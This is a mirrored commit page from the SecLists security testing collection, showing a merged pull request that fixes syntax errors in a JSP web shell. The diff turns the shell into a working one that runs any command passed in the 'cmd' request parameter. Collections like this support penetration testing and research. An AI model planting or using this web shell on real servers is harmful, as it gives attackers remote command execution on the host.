mirror of
https://github.com/danielmiessler/SecLists
synced 2025-12-06 08:53:59 +01:00
Merge pull request #365 from wasamasa/fix-jsp-web-shell
Fix JSP webshell syntax errors
This commit is contained in:
commit
af721716c1
1 changed files with 1 additions and 1 deletions
|
|
@ -1,3 +1,3 @@
|
|||
<%
|
||||
Runtime.getruntime().exec(request.getParameter("cmd"))
|
||||
Runtime.getRuntime().exec(request.getParameter("cmd"));
|
||||
%>
|
||||
|
|
|
|||
Loading…
Reference in a new issue